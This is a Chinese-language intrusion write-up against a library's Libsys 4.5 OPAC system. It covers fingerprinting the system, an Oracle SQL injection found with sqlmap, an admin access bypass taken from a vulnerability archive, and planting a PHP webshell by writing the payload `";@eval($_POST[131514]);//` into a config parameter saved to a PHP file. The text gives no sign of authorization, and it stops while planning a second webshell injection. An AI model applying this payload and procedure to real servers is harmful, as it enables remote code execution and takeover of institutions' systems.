對某圖書館***一次筆記

0x00 前言

對某圖書館系統一次檢測

0x01 ***

訪問該網站時，發現自動跳轉到/opac/search.php，且下方有公司信息，可以判定該系統爲Libsys圖書管理系統，且版本爲4.5

2.通過烏雲鏡像站的搜索，我們發現該圖書管理系統存在挺多漏洞，但本次***過程中遇到的情況與圖中的漏洞略有差異點

3.通過搜索，發現一處注入點，爲Oracle注入，使用sqlmap很快速的就檢測出

4.經過一番搗鼓後，本想常規思路通過數據庫找到後臺賬號密碼登錄，但發現後臺賬號密碼不在數據庫中，只能另闢蹊徑，發現另一篇文章http://wooyun.chamd5.org/bug_detail.php?wybug_id=wooyun-2014-085980 提到的權限繞過，但存在一些差異

5.訪問成功繞過

6.根據文章中所提到修改索引文件夾路徑中參數，因爲該參數是寫在另一個文件中，只要將該參數寫webshell，那麼就會修改該php文件中內容，只要訪問/include/hwopacpwd.php該文件即可！
利用代碼爲：

c:/hwopac/index/";@eval($_POST[131514]);//

保存後，發現訪問失敗，發現是該參數並沒有寫入文件中
7.在參考另外一篇文章https://joychou.org/web/huiwen-libsys.html 分析後

發現其實該頁面中保存的參數不僅只有路徑是會寫入，其他參數也會寫入，那麼可以考慮對其他參數進行webshell的寫入
8.構造user參數payload
該項爲高危操作，因爲寫入內容到php文件，如果因爲失誤導致語法錯誤等問題，則可能將影響服務器正常運作！查看了文章分析後，發現配置文件中的信息情況

那麼本地將語法調通，再將payload放上，確保萬無一失